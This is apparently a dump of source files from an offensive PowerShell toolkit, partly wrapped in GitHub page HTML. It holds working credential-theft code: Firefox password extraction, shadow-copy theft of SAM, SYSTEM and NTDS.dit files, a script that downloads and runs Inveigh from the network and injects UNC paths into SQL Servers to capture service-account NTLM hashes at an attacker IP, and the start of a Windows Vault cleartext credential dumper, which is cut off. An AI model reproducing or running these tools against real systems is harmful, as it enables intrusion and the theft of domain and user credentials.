class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">passwordlist</span> <span class=\"pl-k\">+=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">FoxCreds</span></td>\n      </tr>\n      <tr>\n        <td id=\"L939\" class=\"blob-num js-line-number\" data-line-number=\"939\"></td>\n        <td id=\"LC939\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L940\" class=\"blob-num js-line-number\" data-line-number=\"940\"></td>\n        <td id=\"LC940\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\">#Spit out the results to a file.... or not.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L941\" class=\"blob-num js-line-number\" data-line-number=\"941\"></td>\n        <td id=\"LC941\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">OutFile</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L942\" class=\"blob-num js-line-number\" data-line-number=\"942\"></td>\n        <td id=\"LC942\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L943\" class=\"blob-num js-line-number\" data-line-number=\"943\"></td>\n        <td id=\"LC943\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">passwordlist</span> <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Format-List</span> URL<span class=\"pl-k\">,</span> UserName<span class=\"pl-k\">,</span> Password <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Out-File</span> <span class=\"pl-k\">-</span>Encoding ascii <span class=\"pl-k\">$</span><span class=\"pl-smi\">OutFile</span></td>\n      </tr>\n      <tr>\n        <td id=\"L944\" class=\"blob-num js-line-number\" data-line-number=\"944\"></td>\n        <td id=\"LC944\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L945\" class=\"blob-num js-line-number\" data-line-number=\"945\"></td>\n        <td id=\"LC945\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">else</span></td>\n      </tr>\n      <tr>\n        <td id=\"L946\" class=\"blob-num js-line-number\" data-line-number=\"946\"></td>\n        <td id=\"LC946\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L947\" class=\"blob-num js-line-number\" data-line-number=\"947\"></td>\n        <td id=\"LC947\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">passwordlist</span> <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Format-List</span> URL<span class=\"pl-k\">,</span> UserName<span class=\"pl-k\">,</span> Password</td>\n      </tr>\n      <tr>\n        <td id=\"L948\" class=\"blob-num js-line-number\" data-line-number=\"948\"></td>\n        <td id=\"LC948\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L949\" class=\"blob-num js-line-number\" data-line-number=\"949\"></td>\n        <td id=\"LC949\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L950\" class=\"blob-num js-line-number\" data-line-number=\"950\"></td>\n        <td id=\"LC950\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">kernel32</span>::FreeLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcp120dllHandle</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Out-Null</span></td>\n      </tr>\n      <tr>\n        <td id=\"L951\" class=\"blob-num js-line-number\" data-line-number=\"951\"></td>\n        <td id=\"LC951\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span>::FreeLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcr120dllHandle</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Out-Null</span></td>\n      </tr>\n      <tr>\n        <td id=\"L952\" class=\"blob-num js-line-number\" data-line-number=\"952\"></td>\n        <td id=\"LC952\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">kernel32</span>::FreeLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">mozgluedllHandle</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Out-Null</span></td>\n      </tr>\n      <tr>\n        <td id=\"L953\" class=\"blob-num js-line-number\" data-line-number=\"953\"></td>\n        <td id=\"LC953\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">kernel32</span>::FreeLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Out-Null</span></td>\n      </tr>\n      <tr>\n        <td id=\"L954\" class=\"blob-num js-line-number\" data-line-number=\"954\"></td>\n        <td id=\"LC954\" class=\"blob-code blob-code-inner js-file-line\">      </td>\n      </tr>\n      <tr>\n        <td id=\"L955\" class=\"blob-num js-line-number\" data-line-number=\"955\"></td>\n        <td id=\"LC955\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L956\" class=\"blob-num js-line-number\" data-line-number=\"956\"></td>\n        <td id=\"LC956\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">else</span></td>\n      </tr>\n      <tr>\n        <td id=\"L957\" class=\"blob-num js-line-number\" data-line-number=\"957\"></td>\n        <td id=\"LC957\" class=\"blob-code blob-code-inner js-file-line\">    {</td>\n      </tr>\n      <tr>\n        <td id=\"L958\" class=\"blob-num js-line-number\" data-line-number=\"958\"></td>\n        <td id=\"LC958\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c1\">Write-Warning</span> <span class=\"pl-s\">&quot;Unable to locate default profile&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L959\" class=\"blob-num js-line-number\" data-line-number=\"959\"></td>\n        <td id=\"LC959\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L960\" class=\"blob-num js-line-number\" data-line-number=\"960\"></td>\n        <td id=\"LC960\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L961\" class=\"blob-num js-line-number\" data-line-number=\"961\"></td>\n        <td id=\"LC961\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L962\" class=\"blob-num js-line-number\" data-line-number=\"962\"></td>\n        <td id=\"LC962\" class=\"blob-code blob-code-inner js-file-line\">}</td>\n      </tr>\n</table>\n\n  </div>\n\n</div>\n\n<button type=\"button\" data-facebox=\"#jump-to-line\" data-facebox-class=\"linejump\" data-hotkey=\"l\" class=\"d-none\">Jump to Line</button>\n<div id=\"jump-to-line\" style=\"display:none\">\n  <!-- '\"` --><!-- </textarea></xmp> --></option></form><form accept-charset=\"UTF-8\" action=\"\" class=\"js-jump-to-line-form\" method=\"get\"><div style=\"margin:0;padding:0;display:inline\"><input name=\"utf8\" type=\"hidden\" value=\"&#x2713;\" /></div>\n    <input class=\"form-control linejump-input js-jump-to-line-field\" type=\"text\" placeholder=\"Jump to line&hellip;\" aria-label=\"Jump to line\" autofocus>\n    <button type=\"submit\" class=\"btn\">Go</button>\n</form></div>\n\n\n  </div>\n  <div class=\"modal-backdrop js-touch-events\"></div>\n</div>\n\n    </div>\n  </div>\n\n  </div>\n\n      <div class=\"container site-footer-container\">\n  <div class=\"site-footer\" role=\"contentinfo\">\n    <ul class=\"site-footer-links float-right\">\n        <li><a href=\"https://github.com/contact\" data-ga-click=\"Footer, go to contact, text:contact\">Contact GitHub</a></li>\n      <li><a href=\"https://developer.github.com\" data-ga-click=\"Footer, go to api, text:api\">API</a></li>\n      <li><a href=\"https://training.github.com\" data-ga-click=\"Footer, go to training, text:training\">Training</a></li>\n      <li><a href=\"https://shop.github.com\" data-ga-click=\"Footer, go to shop, text:shop\">Shop</a></li>\n        <li><a href=\"https://github.com/blog\" data-ga-click=\"Footer, go to blog, text:blog\">Blog</a></li>\n        <li><a href=\"https://github.com/about\" data-ga-click=\"Footer, go to about, text:about\">About</a></li>\n\n    </ul>\n\n    <a href=\"https://github.com\" aria-label=\"Homepage\" class=\"site-footer-mark\" title=\"GitHub\">\n      <svg aria-hidden=\"true\" class=\"octicon octicon-mark-github\" height=\"24\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"24\"><path fill-rule=\"evenodd\" d=\"M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z\"/></svg>\n</a>\n    <ul class=\"site-footer-links\">\n      <li>&copy; 2017 <span title=\"0.07698s from github-fe165-cp1-prd.iad.github.net\">GitHub</span>, Inc.</li>\n        <li><a href=\"https://github.com/site/terms\" data-ga-click=\"Footer, go to terms, text:terms\">Terms</a></li>\n        <li><a href=\"https://github.com/site/privacy\" data-ga-click=\"Footer, go to privacy, text:privacy\">Privacy</a></li>\n        <li><a href=\"https://github.com/security\" data-ga-click=\"Footer, go to security, text:security\">Security</a></li>\n        <li><a href=\"https://status.github.com/\" data-ga-click=\"Footer, go to status, text:status\">Status</a></li>\n        <li><a href=\"https://help.github.com\" data-ga-click=\"Footer, go to help, text:help\">Help</a></li>\n    </ul>\n  </div>\n</div>\n\n\n\n  \n\n  <div id=\"ajax-error-message\" class=\"ajax-error-message flash flash-error\">\n    <svg aria-hidden=\"true\" class=\"octicon octicon-alert\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M8.865 1.52c-.18-.31-.51-.5-.87-.5s-.69.19-.87.5L.275 13.5c-.18.31-.18.69 0 1 .19.31.52.5.87.5h13.7c.36 0 .69-.19.86-.5.17-.31.18-.69.01-1L8.865 1.52zM8.995 13h-2v-2h2v2zm0-3h-2V6h2v4z\"/></svg>\n    <button type=\"button\" class=\"flash-close js-flash-close js-ajax-error-dismiss\" aria-label=\"Dismiss error\">\n      <svg aria-hidden=\"true\" class=\"octicon octicon-x\" height=\"16\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z\"/></svg>\n    </button>\n    You can't perform that action at this time.\n  </div>\n\n\n    <script crossorigin=\"anonymous\" src=\"https://assets-cdn.github.com/assets/compat-8a4318ffea09a0cdb8214b76cf2926b9f6a0ced318a317bed419db19214c690d.js\"></script>\n    <script crossorigin=\"anonymous\" src=\"https://assets-cdn.github.com/assets/frameworks-6d109e75ad8471ba415082726c00c35fb929ceab975082492835f11eca8c07d9.js\"></script>\n    <script async=\"async\" crossorigin=\"anonymous\" src=\"https://assets-cdn.github.com/assets/github-8f30c4122a2e20872d9c1f277c02176c552d4488cf69e537b7a785a655cd1559.js\"></script>\n    \n    \n    \n    \n  <div class=\"js-stale-session-flash stale-session-flash flash flash-warn flash-banner d-none\">\n    <svg aria-hidden=\"true\" class=\"octicon octicon-alert\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M8.865 1.52c-.18-.31-.51-.5-.87-.5s-.69.19-.87.5L.275 13.5c-.18.31-.18.69 0 1 .19.31.52.5.87.5h13.7c.36 0 .69-.19.86-.5.17-.31.18-.69.01-1L8.865 1.52zM8.995 13h-2v-2h2v2zm0-3h-2V6h2v4z\"/></svg>\n    <span class=\"signed-in-tab-flash\">You signed in with another tab or window. <a href=\"\">Reload</a> to refresh your session.</span>\n    <span class=\"signed-out-tab-flash\">You signed out in another tab or window. <a href=\"\">Reload</a> to refresh your session.</span>\n  </div>\n  <div class=\"facebox\" id=\"facebox\" style=\"display:none;\">\n  <div class=\"facebox-popup\">\n    <div class=\"facebox-content\" role=\"dialog\" aria-labelledby=\"facebox-header\" aria-describedby=\"facebox-description\">\n    </div>\n    <button type=\"button\" class=\"facebox-close js-facebox-close\" aria-label=\"Close modal\">\n      <svg aria-hidden=\"true\" class=\"octicon octicon-x\" height=\"16\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z\"/></svg>\n    </button>\n  </div>\n</div>\n\n\n  </body>\n</html>\n\n"
  },
  {
    "path": "modules/Get-PasswordFile.ps1",
    "content": "function Get-PasswordFile { \n<# \n.SYNOPSIS \n  \n    Copies either the SAM or NTDS.dit and system files to a specified directory. \n  \n.PARAMETER DestinationPath \n  \n    Specifies the directory to the location where the password files are to be copied. \n  \n.OUTPUTS \n  \n    None or an object representing the copied items. \n  \n.EXAMPLE \n  \n    Get-PasswordFile \"c:\\temp\" \n  \n#>\n  \n    [CmdletBinding()] \n    Param\n    ( \n        [Parameter(Mandatory = $true, Position = 0)] \n        [ValidateScript({Test-Path $_ -PathType 'Container'})]  \n        [ValidateNotNullOrEmpty()] \n        [String] \n        $DestinationPath     \n    ) \n  \n        #Define Copy-RawItem helper function from http://gallery.technet.microsoft.com/scriptcenter/Copy-RawItem-Private-NET-78917643 \n        function Copy-RawItem\n        { \n  \n        [CmdletBinding()] \n        [OutputType([System.IO.FileSystemInfo])] \n        Param ( \n            [Parameter(Mandatory = $True, Position = 0)] \n            [ValidateNotNullOrEmpty()] \n            [String]\n            $Path, \n  \n            [Parameter(Mandatory = $True, Position = 1)] \n            [ValidateNotNullOrEmpty()] \n            [String]\n            $Destination, \n  \n            [Switch]\n            $FailIfExists\n        ) \n  \n        # Get a reference to the internal method - Microsoft.Win32.Win32Native.CopyFile() \n        $mscorlib = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ($_.Location.Split('\\')[-1] -eq 'mscorlib.dll')} \n        $Win32Native = $mscorlib.GetType('Microsoft.Win32.Win32Native') \n        $CopyFileMethod = $Win32Native.GetMethod('CopyFile', ([Reflection.BindingFlags] 'NonPublic, Static'))  \n  \n        # Perform the copy \n        $CopyResult = $CopyFileMethod.Invoke($null, @($Path, $Destination, ([Bool] $PSBoundParameters['FailIfExists']))) \n  \n        $HResult = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() \n  \n        if ($CopyResult -eq $False -and $HResult -ne 0) \n        { \n            # An error occured. Display the Win32 error set by CopyFile \n            throw ( New-Object ComponentModel.Win32Exception ) \n        } \n        else\n        { \n            Write-Output (Get-ChildItem $Destination) \n        } \n    } \n   \n    #Check for admin rights\n    if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\"))\n    {\n        Write-Error \"Not running as admin. Run the script with elevated credentials\"\n        Return\n    }\n         \n    #Get \"vss\" service startup type \n    $VssStartMode = (Get-WmiObject -Query \"Select StartMode From Win32_Service Where Name='vss'\").StartMode \n    if ($VssStartMode -eq \"Disabled\") {Set-Service vss -StartUpType Manual} \n  \n    #Get \"vss\" Service status and start it if not running \n    $VssStatus = (Get-Service vss).status  \n    if ($VssStatus -ne \"Running\") {Start-Service vss} \n  \n        #Check to see if we are on a DC \n        $DomainRole = (Get-WmiObject Win32_ComputerSystem).DomainRole \n        $IsDC = $False\n        if ($DomainRole -gt 3) { \n            $IsDC = $True\n            $NTDSLocation = (Get-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters).\"DSA Database File\"\n            $FileDrive = ($NTDSLocation).Substring(0,3) \n        } else {$FileDrive = $Env:HOMEDRIVE + '\\'} \n      \n        #Create a volume shadow filedrive \n        $WmiClass = [WMICLASS]\"root\\cimv2:Win32_ShadowCopy\"\n        $ShadowCopy = $WmiClass.create($FileDrive, \"ClientAccessible\") \n        $ReturnValue = $ShadowCopy.ReturnValue \n  \n        if ($ReturnValue -ne 0) { \n            Write-Error \"Shadow copy failed with a value of $ReturnValue\"\n            Return\n        }  \n      \n        #Get the DeviceObject Address \n        $ShadowID = $ShadowCopy.ShadowID \n        $ShadowVolume = (Get-WmiObject Win32_ShadowCopy | Where-Object {$_.ID -eq $ShadowID}).DeviceObject \n      \n            #If not a DC, copy System and SAM to specified directory \n            if ($IsDC -ne $true) { \n  \n                $SamPath = Join-Path $ShadowVolume \"\\Windows\\System32\\Config\\sam\" \n                $SystemPath = Join-Path $ShadowVolume \"\\Windows\\System32\\Config\\system\"\n  \n                #Utilizes Copy-RawItem from Matt Graeber \n                Copy-RawItem $SamPath \"$DestinationPath\\sam\"\n                Copy-RawItem $SystemPath \"$DestinationPath\\system\"\n            } else { \n              \n                #Else copy the NTDS.dit and system files to the specified directory             \n                $NTDSPath = Join-Path $ShadowVolume \"\\Windows\\NTDS\\NTDS.dit\" \n                $SystemPath = Join-Path $ShadowVolume \"\\Windows\\System32\\Config\\system\"\n  \n                Copy-RawItem $NTDSPath \"$DestinationPath\\ntds\"\n                Copy-RawItem $SystemPath \"$DestinationPath\\system\"\n            }     \n      \n        #Return \"vss\" service to previous state \n        If ($VssStatus -eq \"Stopped\") {Stop-Service vss} \n        If ($VssStartMode -eq \"Disabled\") {Set-Service vss -StartupType Disabled} \n}\n\n"
  },
  {
    "path": "modules/Get-SQLServiceAccountPwHash3.ps1",
    "content": "\n# author: scott sutherland (@_nullbind), NetSPI 2016\n# script name: Get-SQLServiceAccountPwHash3.ps1\n# requirements: PowerUpSQL and Inveigh\n# description: locate domain sql servers, attempt login, unc path inject to capture password hash of associated service account.\n# example: Get-SQLServiceAccountPwHashes -Verbose -CaptureIp 10.1.1.12\n# Note: alt domain user: runas /noprofile /netonly /user:domain\\users powershell.exe\n\nFunction Get-SQLServiceAccountPwHashes {\n\n    [CmdletBinding()]\n    Param(\n      [Parameter(Mandatory=$false)]\n       [string]$Username,\n\t\n       [Parameter(Mandatory=$false)]\n       [string]$Password,\n\n       [Parameter(Mandatory=$false)]\n       [string]$DomainController,\n\n       [Parameter(Mandatory=$true)]\n       [string]$CaptureIp,\n\n       [Parameter(Mandatory=$false)]\n       [int]$TimeOut = 5\n    )\n\n    Begin \n    {\n        # Attempt to load Inveigh via reflection\n        Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1')\n\n        $TestIt = Test-Path -Path Function:\\Invoke-Inveigh\n        if($TestIt -eq 'True')\n        {\n            Write-Verbose -Message \"Inveigh loaded.\"\n        }else{\n            Write-Verbose -Message \"Inveigh NOT loaded.\"\n            return\n        }\n    }\n\n    Process\n    {\n        # Discover SQL Servers on the Domain via LDAP queries for SPN records\n        Write-Verbose \"Testings access to domain sql servers...\"\n        $SQLServerInstances = Get-SQLInstanceDomain -verbose -CheckMgmt -DomainController $DomainController -Username $Username -Password $Password | Get-SQLConnectionTestThreaded -Verbose -Threads 15 \n        $SQLServerInstancesCount = $SQLServerInstances.count\n        Write-output \"$SQLServerInstancesCount SQL Server instances found\"\n\n        # Get list of SQL Servers that the provided account can log into\n        $AccessibleSQLServers = $SQLServerInstances | ? {$_.status -eq \"Accessible\"}\n        $AccessibleSQLServersCount = $AccessibleSQLServers.count\n\n        # Status user\n        Write-output \"$AccessibleSQLServersCount SQL Server instances can be logged into\"\n        Write-output \"Attacking $AccessibleSQLServersCount accessible SQL Server instances...\"\n\n        # Start sniffing\n        Invoke-Inveigh -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue | Out-Null \n\n        # Perform unc path injection on each one\n        $AccessibleSQLServers | \n        ForEach-Object{\n    \n            # Get current instance\n            $CurrentInstance = $_.Instance\n\n            # Start unc path injection for each interface\n            Write-Output \"$CurrentInstance - Injecting UNC path to \\\\$CaptureIp\\file\"\n\n            # Functions executable by the Public role that accept UNC paths\n            Get-SQLQuery -Instance $CurrentInstance -Query \"xp_dirtree '\\\\$CaptureIp\\file'\" -SuppressVerbose | out-null\t\n            Get-SQLQuery -Instance $CurrentInstance -Query \"xp_fileexist '\\\\$CaptureIp\\file'\" -SuppressVerbose | out-null\t\n            Get-SQLQuery -Instance $CurrentInstance -Query \"BACKUP DATABASE TESTING TO DISK = '\\\\$CaptureIp\\file'\" -SuppressVerbose | out-null\t\n            Get-SQLQuery -Instance $CurrentInstance -Query \"RESTORE VERIFYONLY FROM DISK = '\\\\$CaptureIp\\file'\" -SuppressVerbose | out-null\t\n     \n            # Sleep to give the SQL Server time to send us hashes :)\n            sleep $TimeOut\n \n            # Get hashes\n            Write-Verbose \"Captured password hashes:\"\n            Get-InveighCleartext | Sort-Object\n            Get-InveighNTLMv1 | Sort-Object\n            Get-InveighNTLMv2 | Sort-Object           \n        }\n    }\n\n    End\n    {\n        # Return results\n        Write-Output \"---------------------------------------\"\n        Write-Output \"Final List of Captured password hashes:\"\n        Write-Output \"---------------------------------------\"\n        Get-InveighCleartext | Sort-Object\n        Get-InveighNTLMv1 | Sort-Object\n        Get-InveighNTLMv2 | Sort-Object\n\n        # Stop sniffing\n        Stop-Inveigh | Out-Null \n\n        # Clear cache\n        Clear-Inveigh | Out-Null \n    }\n}\n"
  },
  {
    "path": "modules/Get-VaultCredential.ps1",
    "content": "function Get-VaultCredential\n{\n<#\n.SYNOPSIS\n\nDisplays Windows vault credential objects including cleartext web credentials.\n\nPowerSploit Function: Get-VaultCredential\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n \n.DESCRIPTION\n\nGet-VaultCredential enumerates and displays all credentials stored in the Windows\nvault. Web credentials, specifically are displayed in cleartext. This script was\ninspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt\n\n.EXAMPLE\n\nGet-VaultCredential\n\n.NOTES\n\nOnly web credentials can be displayed in cleartext.\n#>\n    [CmdletBinding()] Param()\n\n    $OSVersion = [Environment]::OSVersion.Version\n    $OSMajor = $OSVersion.Major\n    $OSMinor = $OSVersion.Minor\n\n    #region P/Invoke declarations for vaultcli.dll\n    $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil')\n    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False)\n\n    $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32])\n    $null = $EnumBuilder.DefineLiteral('Undefined', -1)\n    $null = $EnumBuilder.DefineLiteral('Boolean', 0)\n    $null = $EnumBuilder.DefineLiteral('Short', 1)\n    $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2)\n    $null = $EnumBuilder.DefineLiteral('Int', 3)\n    $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4)\n    $null = $EnumBuilder.DefineLiteral('Double', 5)\n    $null = $EnumBuilder.DefineLiteral('Guid', 6)\n    $null = $EnumBuilder.DefineLiteral('String', 7)\n    $null = $EnumBuilder.DefineLiteral('ByteArray', 8)\n    $null = $EnumBuilder.DefineLiteral('TimeStamp', 9)\n    $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10)\n    $null = $EnumBuilder.DefineLiteral('Attribute', 11)\n    $null = $EnumBuilder.DefineLiteral('Sid', 12)\n    $null = $EnumBuilder.DefineLiteral('Last', 13)\n    $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType()\n\n    $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32])\n    $null = $EnumBuilder.DefineLiteral('Illegal', 0)\n    $null = $EnumBuilder.DefineLiteral('Resource', 1)\n    $null = $EnumBuilder.DefineLiteral('Identity', 2)\n    $null = $EnumBuilder.DefineLiteral('Authenticator', 3)\n    $null = $EnumBuilder.DefineLiteral('Tag', 4)\n    $null = $EnumBuilder.DefineLiteral('PackageSid', 5)\n    $null = $EnumBuilder.DefineLiteral('AppStart', 100)\n    $null = $EnumBuilder.DefineLiteral('AppEnd', 10000)\n    $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType()\n\n    $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind])\n    $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet')\n    $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor,\n                                                                                     @([Runtime.InteropServices.LayoutKind]::Explicit),\n                                                                                     $CharsetField,\n                                                                                     @([Runtime.InteropServices.CharSet]::Ansi))\n    $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\n    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4)\n    $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public')\n    $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public')\n    $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public')\n    $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public')\n    $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public')\n    if ($OSMajor -ge 6 -and $OSMinor -ge 2)\n    {\n        $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public')\n    }\n    $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public')\n    $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public')\n    $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public')\n    $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public')\n    $VAULT_ITEM = $TypeBuilder.CreateType()\n\n    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes)\n    $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute)\n    $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0)\n    $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8)\n    $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType()\n\n\n    $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class')\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([Guid].MakeByRefType(),\n                                                                 [UInt32],\n                                                                 [IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([IntPtr]),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([Int32],\n                                                                 [Int32].MakeByRefType(),\n                                                                 [IntPtr].MakeByRefType()),\n                                                      [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                      [Runtime.InteropServices.CharSet]::Auto)\n\n    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems',\n                                                      'vaultcli.dll',\n                                                      'Public, Static',\n                                                      [Reflection.CallingConventions]::Standard,\n                                                      [Int32],\n                                                      [Type[]] @([IntPtr],\n                          